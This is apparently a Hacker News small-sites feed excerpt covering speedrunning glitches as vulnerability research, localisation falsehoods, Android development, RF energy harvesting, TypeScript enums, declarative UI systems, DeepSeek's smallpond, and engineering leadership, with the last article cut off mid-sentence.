Super Mario World runners will place items in extremely precise locations so that the X,Y coordinates form shellcode they can jump to with a dangling reference. Legend of Zelda: Ocarina of Time players will do heap grooming and write a function pointer using the IEEE-754 floating point number bit representation so the game “wrong warps” directly to the end credit sequence... with nothing more than a game controller and a steady hand.

Screenshot from an in-depth technical explanation of a Super Mario 64 glitch. Watch on YouTube.

Some of the game communities will even take it a step further! Tool-assisted speedruns, or "TAS" runs, will perform glitches so precise that they can't reliably be performed by human beings at all. They'll leverage frame-by-frame input recordings in order to hit the right angle on a game controller's stick, every time; they'll hit buttons on the exact video game tick, every time.

And because they have such precise control over their actions in games, they'll likewise be able to consider game glitches with exacting precision. TAS authors are able to leverage inspecting the video game with memory debuggers to craft a use-after-free with the perfect heap spray, or write multiple stages of shellcode payload in their player inventory with button presses.

There's even an entire event at the most popular speedrunning conference, Awesome Games Done Quick/AGDQ, called "TASbot." During it, a robot does all the inputs via a hard-wired controller to perform a tool-assisted speedrun in real time – so it can do things like get arbitrary code execution and use that to replace the video game with an entirely new one, using nothing but controller inputs.

An industry exists!

The fact these people are so technically competent only throws in stark relief how disconnected some of them are from the larger cybersecurity industry. Speedrun glitch hunters will develop heap use-after-free exploits, with accompanied technical write-ups on the level of Google Project Zero… and in doing so, refer to it as an "item storage" glitch, because they developed the knowledge from first principles without ever reading a Phrack article. They'll re-implement disassembled code from Ghidra in C for automated glitch discovery, but without any exposure to American Fuzzy Lop or the large academic body of work driving fuzzer research.

And, critically for us here at Zetier, they don't know you can get paid to do a job very close to finding video game glitches, and so they don't know to apply to our reverse engineering or vulnerability research job postings. A lot of these video game glitch hunters, even the ones writing novel Ghidra loaders or runtime memory analysis scripts, don't think of what they're doing as anything more than a fun hobby; they might go become a normal software engineer, if that. Some of them will look up "IDA Pro" on LinkedIn and see a million malware analysis job postings. No offense to my malware analysis friends, but malware reverse engineering and vulnerability research are two very different roles!

Vulnerability research in industry, unlike more “normal” malware analysis jobs, is usually in the form of an engineer spending significant time investigating exactly how a program works. Like video game glitch discovery, they don’t just care about what it does, but how it does it – and why the authors implemented it in that way, along with how that behavior may affect other parts of the program. Oftentimes, you end up building up a repertoire of small, innocuous “huh that’s weird”-style bugs that are individually useless… until you find some missing piece. And like game glitches, the most satisfying of discoveries on the job are from realizations that there’s a fundamental gap in thinking by the authors, where you don’t just find one glitch but an entire family of glitches, all from the same root cause.

A glimpse of an arbitrary code execution (ACE) exploit walk-through. See the video.

I personally love reading the technical game glitch write-ups that come out of speedrunning communities. Lots of my coworkers, and other people in the industry, likewise enjoy them. I love glitch write-ups because they remind me of the great parts of my job: extremely deep dives into the internals of how programs work, and working around odd constraints. Exploiting vulnerabilities requires performing mental gymnastics in order to chain seemingly innocuous primitives, like walking around out-of-bounds in Pokemon, together to do the thing in a way that allows the author to express their creativity and mastery over a piece of software.

Talking to people in speedrunning communities who love pouring over Assembly, or figuring out exactly what the implications are for a 1-byte buffer overflow in a textbox, only for them to shrug and explain they're reluctantly working in a non-technical industry, comes across to me as a shame. If any of these descriptions speak to you, or bring to mind one of your friends, reach out to hello@zetier.com. We'd love to chat.

Let the interwebs know that vulnerability researchers exist:

Share this on HackerNews

]]>
https://zetier.com/speedrunners-are-vulnerability-researchers/ hacker-news-small-sites-43232880 Sun, 02 Mar 2025 17:40:36 GMT
<![CDATA[Falsehoods programmers believe about languages (localization)]]> thread link) | @zdw
March 2, 2025 | https://www.lexiconista.com/falsehoods-about-languages/ | archive.org

This is what we have to put up with in the software localisation industry.

I can’t believe nobody has done this list yet. I mean, there is one about names, one about time and many others on other topics, but not one about languages yet (except one honorable mention that comes close). So, here’s my attempt to list all the misconceptions and prejudices I’ve come across in the course of my long and illustrious career in software localisation and language technology. Enjoy – and send me your own ones!


  • Sentences in all languages can be templated as easily as in English: {user} is in {location} etc.

  • Words that are short in English are short in other languages too.

  • For any text in any language, its translation into any other language is approximately as long as the original.

  • For every lower-case character, there is exactly one (language-independent) upper-case character, and vice versa.

  • The lower-case/upper-case distinction exists in all languages.

  • All languages have words for exactly the same things as English.

  • Every expression in English, however vague and out-of-context, always has exactly one translation in every other language.

  • All languages follow the subject-verb-object word order.

  • When words are to be converted into Title Case, it is always the first character of the word that needs to be capitalized, in all languages.

  • Every language has words for yes and no.

  • In each language, the words for yes and no never change, regardless of which question they are answering.

  • There is always only one correct way to spell anything.

  • Each language is written in exactly one alphabet.

  • All languages (that use the Latin alphabet) have the same alphabetical sorting order.

  • All languages are written from left to right.

  • Even in languages written from right to left, the user interface still “flows” from left to right.

  • Every language puts spaces between words.

  • Segmenting a sentence into words is as easy as splitting on whitespace (and maybe punctuation).

  • Segmenting a text into sentences is as easy as splitting on end-of-sentence punctuation.

  • No language puts spaces before question marks and exclamation marks at the end of a sentence.

  • No language puts spaces after opening quotes and before closing quotes.

  • All languages use the same characters for opening quotes and closing quotes.

  • Numbers, when written out in digits, are formatted and punctuated the same way in all languages.

  • No two languages are so similar that it would ever be difficult to tell them apart.

  • Languages that have similar names are similar.

  • Icons that are based on English puns and wordplay are easily understood by speakers of other languages.

  • Geolocation is an accurate way to predict the user’s language.

  • Country flags are accurate and appropriate symbols for languages.

  • Every country has exactly one “national” language.

  • Every language is the “national” language of exactly one country.

]]>
https://www.lexiconista.com/falsehoods-about-languages/ hacker-news-small-sites-43232841 Sun, 02 Mar 2025 17:36:20 GMT
<![CDATA[Daily-driving Android as a dev environment]]> thread link) | @tosh
March 2, 2025 | https://mm-dev.rocks/posts/android-as-a-dev-environment/intro/ | archive.org

I get a lot of my development work done on Android devices. That usually means a large tablet, but it’s not impossible to get work done on smaller tablets or even phones (although the smaller you go, the harder it is to maintain ergonomics and practicality).

With Termux/PRoot Distro/Termux:X11 (explained below) I can run all of my most-used Linux apps just like I was sitting at a desktop, silently (ie no fans) and efficiently.

Performance on my S8 Ultra tablet is great — not as fast as the latest most powerful laptops but perfectly comfortable for my usage patterns.

A shortcut to a simple Termux script means I can tap an icon on my Android home screen and boot into the beautiful emptiness of an Ubuntu DWM session in about 5 seconds.

]]>
https://mm-dev.rocks/posts/android-as-a-dev-environment/intro/ hacker-news-small-sites-43232788 Sun, 02 Mar 2025 17:31:34 GMT
<![CDATA[New battery-free technology can power devices using ambient RF signals]]> thread link) | @ohjeez
March 2, 2025 | https://news.nus.edu.sg/nus-researchers-develop-new-battery-free-technology/ | archive.org

In a breakthrough for green energy, researchers demonstrated a novel technique to efficiently convert ambient radiofrequency signals into DC voltage that can power electronic devices and sensors, enabling battery-free operation.

Ubiquitous wireless technologies like Wi-Fi, Bluetooth, and 5G rely on radio frequency (RF) signals to send and receive data. A new prototype of an energy harvesting module – developed by a team led by scientists from the National University of Singapore (NUS) – can now convert ambient or ‘waste’ RF signals into direct current (DC) voltage. This can be used to power small electronic devices without the use of batteries.

RF energy harvesting technologies, such as this, is essential as they reduce battery dependency, extend device lifetimes, minimise environmental impact, and enhance the feasibility of wireless sensor networks and IoT devices in remote areas where frequent battery replacement is impractical.

However, RF energy harvesting technologies face challenges due to low ambient RF signal power (typically less than -20 dBm), where current rectifier technology either fails to operate or exhibits a low RF-to-DC conversion efficiency. While improving antenna efficiency and impedance matching can enhance performance, this also increases on-chip size, presenting obstacles to integration and miniaturisation.

To address these challenges, a team of NUS researchers, working in collaboration with scientists from Tohoku University (TU) in Japan and University of Messina (UNIME) in Italy, has developed a compact and sensitive rectifier technology that uses nanoscale spin-rectifier (SR) to convert ambient wireless radio frequency signals at power less than -20 dBm to a DC voltage.

The team optimised SR devices and designed two configurations: 1) a single SR-based rectenna operational between -62 dBm and -20 dBm, and 2) an array of 10 SRs in series achieving 7.8% efficiency and zero-bias sensitivity of approximately 34,500 mV/mW. Integrating the SR-array into an energy harvesting module, they successfully powered a commercial temperature sensor at -27 dBm.

“Harvesting ambient RF electromagnetic signals is crucial for advancing energy-efficient electronic devices and sensors. However, existing Energy Harvesting Modules face challenges operating at low ambient power due to limitations in existing rectifier technology,” explained Professor Yang Hyunsoo from the Department of Electrical and Computer Engineering at the NUS College of Design and Engineering, who spearheaded the project.

Prof Yang added, “For example, gigahertz Schottky diode technology has remained saturated for decades due to thermodynamic restrictions at low power, with recent efforts focused only on improving antenna efficiency and impedance-matching networks, at the expense of bigger on-chip footprints. Nanoscale spin-rectifiers, on the other hand, offer a compact technology for sensitive and efficient RF-to-DC conversion.”

Elaborating on the team’s breakthrough technology, Prof Yang said, “We optimised the spin-rectifiers to operate at low RF power levels available in the ambient, and integrated an array of such spin-rectifiers to an energy harvesting module for powering the LED and commercial sensor at RF power less than -20 dBm. Our results demonstrate that SR-technology is easy to integrate and scalable, facilitating the development of large-scale SR-arrays for various low-powered RF and communication applications.”

The experimental research was carried out in collaboration with Professor Shunsuke Fukami and his team from TU, while the simulation was carried out by Professor Giovanni Finocchio from UNIME. The results were published in the prestigious journal, Nature Electronics, on 24 July 2024.

Spin-rectifier-based technology for the low-power operation

State-of-the-art rectifiers (Schottky diodes, tunnel diodes and two-dimensional MoS2), have reached efficiencies of 40–70% at Prf ≥ -10 dBm. However, the ambient RF power available from the RF sources such as Wi-Fi routers is less than -20 dBm. Developing high-efficiency rectifiers for low-power regimes (Prf < -20 dBm) is difficult due to thermodynamic constraints and high-frequency parasitic effects. Additionally, on-chip rectifiers require an external antenna and impedance-matching circuit, impeding on-chip scaling. Therefore, designing a rectifier for an Energy Harvesting Module (EHM) that is sensitive to ambient RF power with a compact on-chip design remains a significant challenge.

The nanoscale spin-rectifiers can convert the RF signal to a DC voltage using the spin-diode effect. Although the SR-based technology surpassed the Schottky diode sensitivity, the low-power efficiency is still low (< 1%). To overcome the low-power limitations, the research team studied the intrinsic properties of SR, including the perpendicular anisotropy, device geometry, and dipolar field from the polarizer layer, as well as the dynamic response, which depends on the zero-field tunnelling magnetoresistance and voltage-controlled magnetic anisotropy (VCMA). Combining these optimised parameters with the external antenna impedance-matched with a single SR, the researcher designed ultralow power SR-rectenna.

To improve output and achieve on-chip operation, the SRs were coupled in an array arrangement, with the small co-planar waveguides on the SRs employed to couple RF power, resulting in compact on-chip area and high efficiency. One of the key findings is that the self-parametric effect driven by well-known VCMA in magnetic tunnel junctions-based spin-rectifiers significantly contributes to the low-power operation of SR-arrays, while also enhancing their bandwidth and rectification voltage. In a comprehensive comparison with Schottky diode technology in the same ambient situation and from previous literature assessment, the research team discovered that SR-technology might be the most compact, efficient, and sensitive rectifier technology.

Commenting on the significance of their results, Dr Raghav Sharma, the first author of the paper, shared, “Despite extensive global research on rectifiers and energy harvesting modules, fundamental constraints in rectifier technology remain unresolved for low ambient RF power operation. Spin-rectifier technology offers a promising alternative, surpassing current Schottky diode efficiency and sensitivity in low-power regime. This advancement benchmarks RF rectifier technologies at low power, paving the way for designing next-generation ambient RF energy harvesters and sensors based on spin-rectifiers.”

Next steps

The NUS research team is now exploring the integration of an on-chip antenna to improve the efficiency and compactness of SR technologies. The team is also developing series-parallel connections to tune impedance in large arrays of SRs, utilising on-chip interconnects to connect individual SRs. This approach aims to enhance the harvesting of RF power, potentially generating a significant rectified voltage of a few volts, thus eliminating the need for a DC-to-DC booster.

The researchers also aim to collaborate with industry and academic partners for the advancement of self-sustained smart systems based on on-chip SR rectifiers. This could pave the way for compact on-chip technologies for wireless charging and signal detection systems.

]]>
https://news.nus.edu.sg/nus-researchers-develop-new-battery-free-technology/ hacker-news-small-sites-43232724 Sun, 02 Mar 2025 17:25:49 GMT
<![CDATA[An ode to TypeScript enums]]> thread link) | @disintegrator
March 2, 2025 | https://blog.disintegrator.dev/posts/ode-to-typescript-enums/ | archive.org

It’s official, folks. TypeScript 5.8 is out bringing with it the --erasableSyntaxOnly flag and the nail in the coffin for many of the near-primordial language features like Enums and Namespaces. Node.js v23 joined Deno and Bun in adding support for running TypeScript files withouth a build step. The one true limitation is that only files containing erasable TypeScript syntax are supported. Since Enums and Namespaces (ones holding values) violate that rule since they are transpiled to JavaScript objects. So the TypeScript team made it possible to ban those features with the new compiler flag and make it easy for folks to ensure their TS code is directly runnable.

But the issues with Enums didn’t start here. Over last few years, prominent TypeScript content creators have been making the case against enums on social media, blog posts and short video essays. Let me stop here and say it out loud:

In almost all ways that matter, literal unions provide better ergonomics than enums and you should consider them first.

The problem is that, like the articles I linked to there and many others out there, these statements are not interested in making a case for some of the strengths of enums. While I maintain my position above, I want to spend a minute eulogizing an old friend. Remember, as const assertions, which were introduced in TypeScript 3.4, were necessary to supplant enums. That’s nearly 6 years of using enums since TypeScript 0.9!

Probably my favorite argument in steelmanning enums is that you can document their members and the documentation is available anywhere you are accessing them. This includes deprecating them which can so useful if you are building APIs that evolve over time.

enum PaymentMethod {

CreditCard = "credit-card",

DebitCard = "debig-card",

Bitcoin = "bitcoin",

/**

* Use an electronic check to pay your bills. Please note that this may take

* up to 3 business days to go through.

*

* @deprecated Checks will no longer be accepted after 2025-04-30

*/

Check = "check",

}

const method = PaymentMethod.Check;

There have been many instances where a union member’s value on its own is not perfectly self-explanatory or at least ambiguous when living alongside similar unions in a large codebase. The documentation has to be combined into the TSDoc comment of the union type which cannot reflect deprecations and is not shown when hovering over a union member.

type PaymentMethod =

| "credit-card"

| "debit-card"

| "bitcoin"

/**

* Use an electronic check to pay your bills. Please note that this may

* take up to 3 business days to go through.

*

* @deprecated Checks will no longer be accepted after 2025-04-30

*/

| "check";

const method: PaymentMethod = "check";

There are ways to get around this limitation where object literals with a const assertion are used but the reality is that these literals aren’t typically imported and used by users of a library. They tend to be built up by library authors to have an iterable/indexable mapping around when validating unknown values or to enumerate in a UI e.g. in error messages or to build a <select> dropdown.

There are a couple more quality of life features that enums possess but I’m choosing not to go through here. For me personally, the degraded inline documentation is by far the toughest pill to swallow in moving to literal unions and I wanted to focus on that. I’m really hoping the TypeScript team finds a way to support TSDoc on union members as the world moves away from enums.

]]>
https://blog.disintegrator.dev/posts/ode-to-typescript-enums/ hacker-news-small-sites-43232690 Sun, 02 Mar 2025 17:23:12 GMT
<![CDATA[When Declarative Systems Break]]> thread link) | @iamwil
March 2, 2025 | https://interjectedfuture.com/when-declarative-systems-break/ | archive.org

A couple of months ago, I had to reload everything I knew about reactivity back into my head. I discovered that I missed a large corner of the development around unstructured reactivity, by way of Signals. From arguments about signals vs. functional components on Twitter and in post comments, it sounds like the issue concerns developer affordances of different APIs. From the marketing of signal-based frameworks, it sounds like the issue is a matter of performance.

But the reasons why you'd choose signals over functional component-based frameworks like React have more to do with two things: the shape mismatch between the application data and the UI view and whether the performance requirements can tolerate the mismatch.

For most web apps with median performance requirements, functional component-based frameworks like React work really well, especially when your application state closely matches your UI structure. The declarative API makes maintenance and the mental model easier than it would be otherwise.

However, if the gap between the shape of application state and shape of UI views grows, React’s declarative execution model can lead to inefficient updates, hurting performance. Without built-in escape hatches, developers facing these mismatches turn to Signals—trading some of React’s declarative reasoning for more precise and performant state updates.

The Unspoken Assumption

What happens when a piece of application state needs to be rendered by two sibling UI components? React's common advice is to pull that state up to the closest common ancestor and pass that state down as props to the children.

The fundamental assumption of React is that the shape of your state dependency graph is similar to your component tree. If that's the case, then the affordances of React and the granularity of reactivity are in alignment. That might hold for many apps, but when it doesn’t, you end up forcing your component hierarchy to revolve around these shared state.

A talk on recoil.js illustrates an instance where app state mismatches the UI view

Imagine a canvas application with sidebars, toolbars, and overlays. An object in this common visual-editing app needs to be represented in both left and right sidebars and the middle canvas. The object is rendered visually on the canvas, as a part of an object hierarchy on the left sidebar, and with its properties on the right sidebar. Each region of the UI might need to observe and mutate the same piece of data, but they all live in different parts of the component tree. Following React’s recommendation, you keep lifting state until everything that needs to access it can do so.

Unfortunately, that may mean large swaths of the UI re-render every time the state changes. If your components are mostly functional, that might not be so bad, but if they contain effects (useEffect) or memoization (useMemo), every change can trigger a wave of potential re-computations and callback closures. It’s error-prone and easy to lose track of dependencies. React also opts for correctness over performance by default, so it'll default to re-rendering. Makes sense as a design goal, if one considers how confusing it is when an incremental system updates halfway, and functions are considered cheap to run. However, this can also be a source of frustration when the app seems to keep slowing down and you have to keep providing hints to the runtime via dependency lists and various hooks to not over-render. It can be hard to discern why multiple renders occur without profiling tools. In practice, if the users are performance sensitive, it can feel like you're spending all your time on the submerged mechanics of hinting the declarative runtime instead of touching the viewable components delivering value to users.

Part of the issue is the double-edge of declarative APIs. They're great for reducing complexity in the average case, because the developer only needs to declare the intended goal state. There is nothing else. The system figures out how to find and traverse the path from the current state to the goal state. This frees the developer from keeping track of the previous state in order to compute the next state, and managing state is often the source of bugs.

Unfortunately, every declarative system embeds assumptions about how to traverse the state space during computation from the current state to the goal state. When those assumptions fail, performance suffers because the chosen path from the current state to the goal state is inefficient. Most declarative systems offer no escape hatch or way to influence the execution policy. At least SQL provides EXPLAIN so you can see its plan—many others don’t even offer that. As a result, when performance is critical and these assumptions break, developers often have no choice but to abandon the system entirely and build a new solution from scratch.

Signals is one dominant alternative. It lets you define a separate dependency graph that tracks how state updates should flow, independent of the UI view tree. Whenever a signal changes, only the specific parts of your interface that depend on it need to re-render. This can lead to substantial performance improvements in applications that have complex or cross-cutting state.

The trade-off is that freely accessible signals can get messy if every component in the UI view tree can update them. That’s why library authors often offer namespacing or scoping for signals, so you can define how far their influence extends without losing track of where updates come from. In addition, it leaves behind all the affordances of a declarative API, where the developer only has to declare the intended goal. Hence, developers might need extra help reasoning about state updates, such as a visual debugger for the state dependency computational graph.

For developers weighing their options, the trade-off is pretty clear: stick with React if your data aligns well with your UI and you value a straightforward, mature ecosystem. But if you repeatedly find your data graph crossing multiple parts of the UI, or you need to avoid re-renders at all costs, Signals could be your best bet. This can be hard to tell a priori, as both can evolve over time as the understanding of the domain changes and hence the requirements change. In the end, it's trade-offs.

Declarative escape hatches

This question transcends React and Signals. This trade-off plays itself out across the programming landscape: retained mode vs immediate mode, functional vs object-oriented, and in declarative vs imperative configuration management. Even in the world of database queries, where SQL wins by a large margin, there are still skirmishes with imperative alternatives like PL/SQL and Transact-SQL. In almost all cases, the desire for reduced complexity in managing state draws developers towards declarative systems, and the desire for performance pulls them away. Can a declarative system—one that focuses on describing the end state rather than step-by-step updates—be extended to handle edge cases requiring more granular performance?

Improving execution internals

One angle of attack is to keep the declarative API as is, and just improve a declarative system's ability to judge which computational branch to go down to get to the goal state. The current ability of React to judge what branch to examine is hampered by the limitations of Javascript in this regard.

  • Dynamic Types and References: JS arrays and objects are reference-based, lacking an efficient built-in mechanism for detecting which nested properties have changed. Structural equality checks grow expensive and quickly become impractical for large data.
  • Immutable-by-Convention: React and similar frameworks rely on immutability so they can compare references for performance. Yet even with disciplined immutability, the system can’t know exactly which pieces of your state changed unless you manually break them into discrete atoms or rely on advanced libraries.
  • Component Granularity: React treats a function or class as the smallest unit of re-render. Fine-grained updates would require skipping parts of a single function’s output—something that clashes with the idea of purely atomic render functions.

Let's try tackling each of these in turn.

What if we had true immutable complex values? A truly immutable language or runtime, like Clojure or Haskell, can efficiently detect changes via structural sharing. It knows exactly when something has changed, and can avoid computational branches it knows for sure hasn't changed. The system wouldn't need heuristics to guess or require hints from the developer. The downside is that immutable values are grow-only, and most languages don't support their semantics by default. Hence, there would have to be some kind of expiration policy for the history of changes in an immutable value.

Perhaps instead, we can use version clocks to indicate change internally? Imagine attaching a version clock to each field or sub-object. When that field changes, its clock increments. This allows a more direct mapping of ‘property changed → which UI depends on it.’ In essence, it introduces partial reactivity: your runtime or compiler can skip re-renders for unaffected properties. On the plus side, this structure isn't ever-growing, like immutable data structures. And if everything is truly pure and transparent, you won’t get the wrong computations—at least in theory. But real apps often have side effects, dynamic property usage, concurrency concerns, or incomplete signals about exactly which bits of code are dependent on which state. That’s how “wrong” decisions or extra re-renders slip in, even in a system with perfectly immutable data or carefully maintained version vectors.

Even if branch prediction is solved with immutable values or version vectors that something changed, if your declarative system is still re-running entire ‘components’ or top-level functions, then you only solve half the problem. You know something changed, but you still lack a built-in way to skip re-rendering subparts of the UI unless you subdivide your data into separate states, each pinned to a unique piece of UI.

What about using algebraic effects for finer granularity than a single functional component? Algebraic effects could theoretically let you intercept specific sub-expressions within a single rendering function. Each sub-expression might read from a piece of state and produce an effect, so if that piece of state doesn’t change, the runtime can skip re-running that sub-expression. Hence, any state changes within a component are yielding effects that alter a UI View. I think if you squint a little, this is along the lines of what Signal-based frameworks do.

Lastly, there are algebraic incremental approaches like differential dataflow and DBSP that restrict operations for moving state to those that can be defined incrementally; for any previous input x, if I change the input to x + 𝚫, we can compute f(x + 𝚫) without recomputing f(x) all over again. This approach seems very promising, but I suspect there is a different kind of alignment problem here. Just like in CRDTs, while the merge might be algebraically correct, you might get semantically nonsense merges. I suspect it might be the same for these algebraic incremental approaches.

Giving declarative policy hints

Perhaps any domain will have edge cases that need to be nudged by the developer. But instead of diving into the minutiae of when to re-render each sub-expression imperatively as an escape-hatch, one could imagine a higher-level, purely declarative policy system. In this approach, you’d define explicit relationships among various state slices and UI views. For instance, you might declare, “These three states are tightly coupled and should always update together,” or “This component’s render only depends on fields A, B, and C from the global state.”

The runtime could then use those policies to group updates intelligently, determining which components can or should re-render at the same time. This is less about micromanaging the exact lines of code to skip and more about giving the framework a bird’s-eye view of which parts of the data graph belong together.

In principle, this moves some complexity from low-level reactivity (like signals) into a set of higher-level declarations—an attempt to keep the developer experience more ‘big picture’ rather than diving into partial reactivity on a field-by-field basis. But implementing such a policy system is still far from trivial.

One major challenge is the need for a purely declarative way to define how state partitions map to UI partitions, so the runtime or compiler can interpret those policy statements and assemble an efficient dependency graph. Even then, developers typically end up labeling or grouping their data—a practice that feels a lot like signals, just at a coarser level—revealing how much low-level reactivity logic still lurks behind the declarative veneer.

It’s an intriguing middle ground. By defining relationships—rather than line-by-line checks—you’re nudging the system to do partial updates without stepping fully into an imperative approach. Yet, you still risk complexity if policies become too fragmented or if states have inter-dependencies that defy simple grouping. Ultimately, it remains an open question whether any such policy system could achieve the fine-grained performance benefits of Signals without reintroducing a fair amount of ‘reactivity bookkeeping’ behind the scenes.

The Tension in Declarative Systems

Ultimately, any purely declarative system is predicated on the idea that you describe what you want, and the framework figures out how to accomplish it. Once you start dictating precisely which parts of the system can skip reprocessing—and under what conditions—you’re veering into partial reactivity. You’re effectively telling the system how it should schedule updates, imposing custom rules on the execution plan.

Of course, you can graft fine-grained controls onto a declarative model, but each addition gradually erodes its simplicity. You might need to annotate or restructure code so the runtime can pinpoint which sub-expressions rely on specific pieces of data, while the framework itself maintains a specialized “update graph”—much like Signals. Inevitably, you’ve stepped away from a purely declarative approach into a hybrid that merges declarative goals with partial reactivity under the hood.

You can approach this issue asymptotically, but there’s no free lunch: staying fully declarative often means accepting broad recomputations that go beyond what’s strictly necessary, while trying to micro-optimize every expression leads you into describing how sub-expressions should update—edging into partial reactivity. Put differently, the deeper you dive into fine-grained updates, the less you can rely on a purely declarative “describe the goal” style, because you inevitably end up declaring which pieces of your code need to update and when, rather than just what the final state should be.

In other words, the more the system needs to handle fine-grained updates, the less purely declarative it becomes. You can blend paradigms, but that hybrid approach often demands more mental overhead and/or compile-time machinery.

End of the day

So, is it impossible for a declarative system to handle all edge cases with top-tier performance? Not strictly. You can embed partial reactivity or Signals-like mechanisms via deep immutability, version clocks, algebraic effects, or advanced compile steps. But each move in that direction redefines the purity of your declarative abstraction and ushers in added complexity.

If your data shape aligns with your UI and you don’t need hyper-optimized updates, a declarative framework remains a wonderful solution. But for edge cases—like real-time apps with interwoven data dependencies—other paradigms do a better job of pinpointing precisely what changed and when. After all, it’s hard to remain ‘purely declarative’ once you start asking the system to skip internal steps under certain conditions.

That’s the central tension: declarative frameworks elegantly solve the common case but inevitably bump into scenarios that push them beyond their comfort zone. There’s no perfect solution that’s both purely declarative and infinitely adaptable. As soon as you need the latter, you’re knocking on the door of an imperative stance on updates.

]]>
https://interjectedfuture.com/when-declarative-systems-break/ hacker-news-small-sites-43232549 Sun, 02 Mar 2025 17:12:25 GMT
<![CDATA[Understanding Smallpond and 3FS]]> thread link) | @mritchie712
March 2, 2025 | https://www.definite.app/blog/smallpond | archive.org

March 2, 202510 minute read

Mike Ritchie

I didn't have "DeepSeek releases distributed DuckDB" on my 2025 bingo card.

You may have stumbled across smallpond from Twitter/X/LinkedIn hype. From that hype, you might have concluded Databricks and Snowflake are dead 😂. Not so fast. The reality is, although this is interesting and powerful open source tech, it's unlikely to be widely used in analytics anytime soon. Here's a concise breakdown to help you cut through the noise.

We'll cover:

  1. what smallpond and its companion, 3FS, are
  2. if they're suitable for your use case and if so
  3. how you can use them

What is smallpond?

smallpond is a lightweight, distributed data processing framework recently introduced by DeepSeek. It extends DuckDB (typically a single-node analytics database) to handle larger datasets across multiple nodes. smallpond enables DuckDB to manage distributed workloads by using a distributed storage and compute system.

Key features:

  • Distributed Analytics: Allows DuckDB to handle larger-than-memory datasets by partitioning data and running analytics tasks in parallel.
  • Open Source Deployment: If you can manage to get it running, 3FS would give you powerful and performant storage at a fraction of the cost of alternatives.
  • Manual Partitioning: Data is manually partitioned by users, and smallpond distributes these partitions across nodes for parallel processing.

What is 3FS?

3FS, or Fire-Flyer File System, is a high-performance parallel file system also developed by DeepSeek. It's optimized specifically for AI and HPC workloads, offering extremely high throughput and low latency by using SSDs and RDMA networking technology. 3FS is the high-speed, distributed storage backend that smallpond leverages to get it's breakneck performance. 3FS achieves a remarkable read throughput of 6.6 TiB/s on a 180-node cluster, which is significantly higher than many traditional distributed file systems.

How Can I Use It?

To start, same as any other python package, uv pip install smallpond. Remove uv if you like pain.

But to actually get the benefits of smallpond, it'll take much more work and depends largely on your data size and infrastructure:

  • Under 10TB: smallpond is likely unnecessary unless you have very specific distributed computing needs. A single-node DuckDB instance or simpler storage solutions will be simpler and possibly more performant. To be candid, using smallpond at a smaller scale, without Ray / 3FS is likely slower than vanilla DuckDB and a good bit more complicated.
  • 10TB to 1PB: smallpond begins to shine. You'd set up a cluster (see below) with several nodes, leveraging 3FS or another fast storage backend to achieve rapid parallel processing.
  • Over 1PB (Petabyte-Scale): smallpond and 3FS were explicitly designed to handle massive datasets. At this scale, you'd need to deploy a larger cluster with substantial infrastructure investments.

Deployment typically involves:

  1. Setting up a compute cluster (AWS EC2, Google Compute Engine, or on-prem).
  2. Deploying 3FS on nodes with high-performance SSDs and RDMA networking.
  3. Installing smallpond via Python to run distributed DuckDB tasks across your cluster.

Steps #1 and #3 are really easy. Step #2 is very hard. 3FS is new, so there's no guide on how you would set it up on AWS or any other cloud (maybe DeepSeek will offer this?). You could certainly deploy it on bare metal, but you'd be descending into a lower level of DevOps hell.

Note: if you're in the 95% of companies in the under 10TB bucket, you should really try Definite.

I experimented with running smallpond with S3 swapped in for 3FS here, but it's unclear what, if any, performance gains you'd get over scaling up a single node for moderate-sized data.

Is smallpond for me?

tl;dr: probably not.

Whether you'd want to use smallpond depends on several factors:

  • Your Data Scale: If your dataset is under 10TB, smallpond adds unnecessary complexity and overhead. For larger datasets, it provides substantial performance advantages.
  • Infrastructure Capability: smallpond and 3FS require significant infrastructure and DevOps expertise. Without a dedicated team experienced in cluster management, this could be challenging.
  • Analytical Complexity: smallpond excels at partition-level parallelism but is less optimized for complex joins. For workloads requiring intricate joins across partitions, performance might be limited.

How Smallpond Works (Under the Hood)

Lazy DAG Execution
Smallpond uses lazy evaluation for operations like map(), filter(), and partial_sql(). It doesn't run these immediately. Instead, it builds a logical execution plan as a directed acyclic graph (DAG), where each operation becomes a node (e.g., SqlEngineNode, HashPartitionNode, DataSourceNode).

Nothing actually happens until you trigger execution explicitly with actions like:

  • write_parquet() — Writes data to disk
  • to_pandas() — Converts results to a pandas DataFrame
  • compute() — Forces computation explicitly
  • count() — Counts rows
  • take() — Retrieves a subset of rows

This lazy evaluation is efficient because it avoids unnecessary computations and optimizes the workflow.

From Logical to Execution Plan
When you finally trigger an action, the logical plan becomes an execution plan made of specific tasks (e.g., SqlEngineTask, HashPartitionTask). These tasks are the actual work units distributed and executed by Ray.

Ray Core and Distribution
Smallpond’s distribution leverages Ray Core at the Python level, using partitions for scalability. Partitioning can be done manually, and Smallpond supports:

  • Hash partitioning (based on column values)
  • Even partitioning (by files or row counts)
  • Random shuffle partitioning

Each partition runs independently within its own Ray task, using DuckDB instances to process SQL queries. This tight integration with Ray emphasizes horizontal scaling (adding more nodes) rather than vertical scaling (larger, more powerful nodes). To use it at scale, you’ll need a Ray cluster. You can run one on your own infrastructure on a cloud provider (e.g. AWS), but if you just want to test this out, it'll be easier to get started with Anyscale (founded by Ray creators).

Conclusion

smallpond and 3FS offer powerful capabilities for scaling DuckDB analytics across large datasets. However, their complexity and infrastructure demands mean they're best suited for scenarios where simpler solutions no longer suffice. If you're managing massive datasets and already have robust DevOps support, smallpond and 3FS could significantly enhance your analytics capabilities. For simpler scenarios, sticking with a single-node DuckDB instance or using managed solutions remains your best option.

]]>
https://www.definite.app/blog/smallpond hacker-news-small-sites-43232410 Sun, 02 Mar 2025 17:00:30 GMT
<![CDATA[Lessons learned setting up a global engineering org at Google]]> thread link) | @gpi
March 2, 2025 | https://newsletter.eng-leadership.com/p/5-lessons-learned-setting-up-a-global | archive.org

It’s getting close to the start of the March cohort of the course Senior Engineer to Lead: Grow and thrive in the role. We start on March 11!

Here is what students of the last cohort are saying:

If you wish to learn the competencies needed to grow and thrive in the Lead role (Tech Lead (Staff), Team Lead, EM), this would be a great course for you.

I want to enroll!

Looking forward to seeing some of you there!

Let’s get back to this week’s thought.

The number one misconception that people may think is that adding new people to the team will make the progress linearly better.

I’ve formed and scaled many different teams and orgs and it’s never been the case where adding a new person or a new team would increase productivity relative to how many new people we add.

Especially not in the beginning, but with the right approach we can optimize the productivity and ensure that with every new person and the team that we add, there will be increase of business value.

Things that help with this the most?

It’s all about creating a good culture, inspiring teamwork, creating a good onboarding experience + empowering and uplifting your people.

Lucky for us, we have

